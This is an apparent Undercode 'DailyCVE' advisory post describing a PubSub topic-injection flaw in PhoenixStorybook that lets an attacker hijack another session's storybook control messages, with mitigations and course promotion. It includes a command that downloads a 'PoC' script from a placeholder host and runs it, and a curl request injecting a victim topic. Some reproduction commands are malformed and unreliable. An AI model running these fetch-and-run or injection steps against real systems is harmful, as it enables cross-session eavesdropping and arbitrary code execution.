Listen to this Post
Intro (How the CVE works):
The vulnerability resides in `PhoenixStorybook.Story.ComponentIframeLive.handle_params/3` (lines 24‑30). This LiveView component is responsible for rendering storybook iframes. It accepts a `topic` parameter directly from the URL query string without any validation. When the iframe LiveView mounts, it calls `Phoenix.PubSub.broadcast!` on the shared `PhoenixStorybook.PubSub` server, sending a tuple `{:component_iframe_pid, self()}` to the user‑supplied topic.
Normally, a legitimate playground LiveView subscribes to a secret, session‑bound topic and waits for the iframe’s pid to establish direct `send/2` communication for control messages (variation state, theme toggles, extra assigns). The attacker only needs to know or guess another user’s playground topic. By crafting a URL like /storybook/iframe/<story>?topic=<victim_topic>, the attacker’s browser mounts its own iframe LiveView. The `handle_params` callback reads `params[“topic”]` – now the victim’s topic – and broadcasts the attacker’s iframe pid onto that topic.
The victim’s playground, which is subscribed to its private topic, receives {:component_iframe_pid, attacker_pid}. Believing this is its own iframe, it starts sending sensitive control messages directly to the attacker’s iframe process. There is no authentication, no session binding, and no ownership check on the topic. The attack works across completely separate sessions (no shared cookies or credentials). The only precondition is that the attacker can reach the iframe route (unauthenticated by default) and knows or brute‑forces a target topic. This leads to a cross‑session information leak and potential message injection. The fix involves deriving the topic server‑side from the LiveView session or nesting the iframe under the playground to eliminate the broadcast handshake.
DailyCVE Form:
Platform: PhoenixStorybook
Version: ≤ 1.0.0
Vulnerability: PubSub topic injection
Severity: Critical
Date: 2024‑11‑15
Prediction: 2024‑12‑01
What Undercode Say (Analytics):
Clone and run the official PoC script
curl -O https://example.com/cross_session_pubsub_injection.exs
elixir cross_session_pubsub_injection.exs
Manual reproduction: start a vulnerable Phoenix endpoint
mix phx.new demo --no-ecto
cd demo
echo 'live_storybook("/storybook", backend_module: MyStorybook)' in router.ex
mix deps.add phoenix_storybook 1.0.0
iex -S mix phx.server
Attacker injects topic via curl (replace VICTIM_TOPIC)
curl "http://localhost:4000/storybook/iframe/demo?topic=VICTIM_TOPIC"
Exploit:
- Attacker identifies or guesses a victim’s playground topic (e.g., via topic leak or common pattern).
- Attacker sends a GET request to `/storybook/iframe/
?topic= ` from any browser or HTTP client. - The vulnerable iframe LiveView broadcasts its pid onto the victim’s topic.
- Victim’s playground receives the attacker’s pid and sends all subsequent control messages (variation state, theme changes, custom assigns) to the attacker’s process.
- Attacker captures and potentially responds to those messages, hijacking the victim’s storybook interaction.
Protection:
- Upgrade to a patched version (when available).
- Apply a hotfix: override `ComponentIframeLive.handle_params/3` to ignore the query parameter and derive the topic from the signed session.
- Alternatively, configure the storybook to run only on internal networks or add authentication middleware to the `/storybook` route.
- Monitor logs for unexpected `?topic=` parameters in iframe requests.
Impact:
Cross‑session information disclosure of all storybook control messages (variation selections, theme toggles, developer‑defined extra assigns) sent from a victim’s playground to an attacker‑controlled iframe. An unauthenticated attacker who knows or guesses a playground’s topic can fully redirect the victim’s private communication, potentially leading to further injection attacks or exfiltration of sensitive state. No authentication bypass required – the iframe route is publicly reachable by design.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
